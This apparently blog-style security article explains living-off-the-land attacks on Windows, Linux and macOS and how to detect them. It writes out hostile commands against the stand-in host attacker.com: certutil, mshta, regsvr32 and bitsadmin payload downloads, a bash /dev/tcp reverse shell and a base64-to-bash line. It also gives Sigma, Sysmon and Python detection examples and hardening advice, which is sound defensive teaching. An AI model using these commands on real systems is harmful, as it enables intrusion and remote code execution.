
Living-Off-the-Land Attacks: How Hackers Abuse LOLBins and LOLBAS

Attackers use your own OS tools against you. Learn how LOLBins and LOLBAS attacks work, which binaries are most abused, and how to defend against them.


Modern attackers rarely bring their own tools. Instead, they weaponize the binaries already installed on your operating system — Microsoft-signed executables that your EDR and antivirus trust implicitly. This technique is called living off the land, and the binaries abused are collectively known as LOLBins (Living Off the Land Binaries) on Linux/macOS and LOLBAS (Living Off the Land Binaries and Scripts) on Windows.

Why Living-Off-the-Land Works So Well

Traditional security tools build their detection logic around known-bad signatures and suspicious file hashes. When an attacker executes a payload using certutil.exe — a legitimate Windows certificate utility — the AV sees a trusted, signed Microsoft binary doing its job. The malicious behavior hides behind a mask of legitimacy.

There are three main reasons LOLBAS attacks succeed:

  1. Trust inheritance — These binaries are signed by Microsoft and trusted by default
  2. Whitelisting blind spots — Application control policies often explicitly allow system binaries
  3. Blend-in with normal traffic: powershell.exe making an outbound connection looks like normal admin activity

The LOLBAS Project

The LOLBAS Project (lolbas-project.github.io) catalogs every Windows binary, library, and script that can be abused for offensive purposes. Each entry documents:

  • Execute — run arbitrary code
  • Download — pull files from the internet
  • Upload — exfiltrate data
  • Bypass — evade security controls
  • Credentials — dump or manipulate credentials

As of 2026, the project documents over 200 entries. Here are the most actively abused.

Top Abused LOLBins on Windows

certutil.exe

Originally designed to manage certificates, certutil can download files and decode Base64:

# Download a file from the internet
certutil.exe -urlcache -split -f http://attacker.com/payload.exe C:\Windows\Temp\p.exe

# Decode a Base64-encoded file
certutil.exe -decode encoded.b64 decoded.exe

Real-world use: Used extensively by APT groups like Lazarus and various ransomware operators for initial payload staging.

mshta.exe

The Microsoft HTML Application Host runs .hta files — HTML documents with embedded VBScript or JScript that execute with full script permissions:

mshta.exe http://attacker.com/evil.hta
mshta.exe javascript:a=GetObject("script:http://attacker.com/payload.sct").Exec();close();

HTA files bypass many browser security restrictions because mshta.exe is a trusted host process.

regsvr32.exe

regsvr32 can load remote scriptlets (.sct files) — a technique known as Squiblydoo:

regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

This technique executes JScript or VBScript remotely without writing any file to disk first, and regsvr32.exe makes outbound HTTP connections that many proxies permit.

bitsadmin.exe

The Background Intelligent Transfer Service admin tool can download files:

bitsadmin /transfer myJob /download /priority high http://attacker.com/beacon.exe C:\Windows\Temp\beacon.exe

BITS jobs also persist across reboots by default, making this useful for maintaining persistence.

wmic.exe

Windows Management Instrumentation Command-line can execute processes locally or remotely:

wmic process call create "powershell.exe -enc <payload>"
wmic /node:TARGET process call create "cmd.exe /c whoami > C:\out.txt"

rundll32.exe

rundll32 loads a DLL and calls one of its exported functions. Attackers use it to run malicious DLL code under a trusted, Microsoft-signed host process instead of launching a conspicuous new executable:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("payload.exe")

LOLBAS on Linux and macOS

Linux and macOS have their own equivalent LOLBins, documented at gtfobins.github.io:

Binary          Abuse Technique
curl / wget     Download payloads, exfiltrate data
python3         Spawn reverse shells, read files
nc (netcat)     Bind/reverse shells
bash            Execute base64-decoded payloads inline
openssl         Encrypted reverse shells
find            Execute commands via -exec
awk / perl      One-liner reverse shells

A common Linux pivot after gaining initial access:

# Reverse shell using only bash (no netcat required)
bash -i >& /dev/tcp/attacker.com/4444 0>&1

# Base64-decode and execute in memory
echo "cGF5bG9hZA==" | base64 -d | bash

How Attackers Chain LOLBins Together

Sophisticated attackers rarely use just one LOLBin. They chain them to complicate detection:

  1. A phishing email delivers a Word document with a macro
  2. The macro calls mshta.exe with a remote URL
  3. The HTA file calls certutil.exe to decode a payload stored as Base64 in the registry
  4. The payload is executed via rundll32.exe
  5. Persistence is established via a bitsadmin job

Each hop uses a different trusted binary, and no single step looks definitively malicious in isolation.

Detection Strategies

Command-Line Argument Logging

Most LOLBAS abuse is detectable through the command-line arguments passed to these binaries. Enable Process Creation Auditing (Event ID 4688) with command-line logging:

Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy
> Detailed Tracking > Audit Process Creation = Success

And enable command-line capture:

Administrative Templates > System > Audit Process Creation
> Include command line in process creation events = Enabled

Sigma Rules for LOLBAS

Sigma is the open standard for SIEM detection rules. The SigmaHQ repository contains hundreds of rules targeting LOLBAS abuse. Example rule concept for certutil downloading:

title: Certutil Download
status: stable
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - '-urlcache'
      - '-decode'
  condition: selection

Import these into Splunk, Elastic SIEM, or Microsoft Sentinel.
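As an added example (not code from the article or from the SigmaHQ project), here is the selection logic of that rule implemented in Python and run over constructed 4688 and Sysmon EID 1 events; the field mapping and the sample command lines are assumptions.

```python
# Added example (not from the article or SigmaHQ): applies the selection logic
# of the rule above to constructed 4688 / Sysmon EID 1 events parsed into dicts.
# Sigma's process_creation field names map onto different native fields.
FIELD_MAP = {
    "Image": ("Image", "NewProcessName"),      # Sysmon EID 1 / Security 4688
    "CommandLine": ("CommandLine",),
}

# The rule's selection as data: fields are ANDed, listed values are ORed.
CERTUTIL_DOWNLOAD = {
    "Image|endswith": ["\\certutil.exe"],
    "CommandLine|contains": ["-urlcache", "-decode"],
}

def field_value(event, sigma_field):
    """Return the event's value for a Sigma field name, or '' if absent."""
    for native in FIELD_MAP.get(sigma_field, (sigma_field,)):
        if native in event:
            return str(event[native])
    return ""

def matches(event, selection):
    """Sigma string matching is case-insensitive, so both sides are lowercased."""
    for key, values in selection.items():
        field, _, modifier = key.partition("|")
        actual = field_value(event, field).lower()
        wanted = [v.lower() for v in values]
        if modifier == "endswith":
            ok = any(actual.endswith(v) for v in wanted)
        elif modifier == "contains":
            ok = any(v in actual for v in wanted)
        else:                      # no modifier: exact match
            ok = actual in wanted
        if not ok:
            return False
    return True

# Constructed sample events: Sysmon-style, 4688-style, and a benign certutil run.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.exe C:\\Windows\\Temp\\p.exe"},
    {"EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "CertUtil.exe -DECODE encoded.b64 decoded.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -store My"},
]

def alerts(events=SAMPLE_EVENTS, selection=CERTUTIL_DOWNLOAD):
    return [e["CommandLine"] for e in events if matches(e, selection)]
```

certutil accepts its switches with either a leading hyphen or a leading slash, so a production rule should list both spellings.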

Sysmon Event ID 1 + Network Events

Sysmon Event ID 1 (Process Creation) captures full command lines. Combine with Event ID 3 (Network Connection) to catch LOLBins making unexpected outbound connections:

  • certutil.exe connecting to external IPs
  • mshta.exe making HTTP/HTTPS connections
  • regsvr32.exe with network activity
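The correlation described above, as an added example in Python (not code from the article or from Sysmon): EID 3 network records are joined to their EID 1 parent by ProcessGuid, and a finding is raised when a watched LOLBin reaches an address outside the internal ranges. The watch list, the internal ranges, the GUIDs and the IPs are all assumptions.

```python
# Added example (not from the article): joins constructed Sysmon EID 1 and
# EID 3 records by ProcessGuid and flags the LOLBins above when they reach a
# destination outside the internal ranges. GUIDs and IPs are made up.
import ipaddress

# LOLBins that should not normally initiate outbound connections.
WATCHED = {"certutil.exe", "mshta.exe", "regsvr32.exe", "bitsadmin.exe"}

# Assumed internal ranges: RFC 1918, loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_external(ip):
    """True when the destination lies outside every internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def correlate(events):
    """One finding per external connection made by a watched LOLBin.
    EID 3 events are joined to the EID 1 event sharing their ProcessGuid."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] != 3:
            continue
        proc = procs.get(e["ProcessGuid"])
        if proc is None:
            continue  # connection with no matching process record; skip
        binary = proc["Image"].rsplit("\\", 1)[-1].lower()
        if binary in WATCHED and is_external(e["DestinationIp"]):
            findings.append({"binary": binary,
                             "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}',
                             "cmdline": proc["CommandLine"]})
    return findings

# Constructed sample events using Sysmon's field names.
SAMPLE = [
    {"EventID": 1, "ProcessGuid": "{guid-1}", "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.exe p.exe"},
    {"EventID": 3, "ProcessGuid": "{guid-1}", "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"EventID": 1, "ProcessGuid": "{guid-2}", "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe C:\\Tools\\internal.hta"},
    {"EventID": 3, "ProcessGuid": "{guid-2}", "DestinationIp": "10.0.0.5", "DestinationPort": 445},
    {"EventID": 1, "ProcessGuid": "{guid-3}", "Image": "C:\\Program Files\\Browser\\browser.exe",
     "CommandLine": "browser.exe"},
    {"EventID": 3, "ProcessGuid": "{guid-3}", "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]
```

Running correlate(SAMPLE) returns only the certutil finding: the mshta connection stays inside 10.0.0.0/8 and the browser is not on the watch list.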

Microsoft Defender Attack Surface Reduction

Enable these ASR rules to block the most common LOLBAS techniques:

Rule Name                                              GUID
Block executable content from email/webmail            BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block Office apps from creating child processes        D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block JavaScript or VBScript from launching downloads  D3E037E1-3EB8-44C8-A917-57927947596D
Block process creations from PSExec and WMI            D1E49AAC-8F56-4280-B9BA-993A6D77406C

Hardening Recommendations

  • AppLocker or WDAC: Block mshta.exe, wscript.exe, cscript.exe, and regsvr32.exe for standard users
  • Restrict certutil: Block outbound HTTP from certutil.exe at the proxy/firewall level
  • Constrained PowerShell: Enable PowerShell Constrained Language Mode
  • User privilege limits: Standard users should not be able to write to C:\Windows\Temp
  • Egress filtering: Only allow outbound HTTP/HTTPS from approved applications via a proxy

Conclusion

Living-off-the-land attacks are effective precisely because they exploit trust. By using tools that are already installed, signed, and whitelisted, attackers sidestep an enormous portion of the security stack. Defense requires shifting from blacklisting bad tools to monitoring the behavior of good ones — what they connect to, what child processes they spawn, and what commands they run. The LOLBAS Project is an excellent starting point for understanding your exposure.
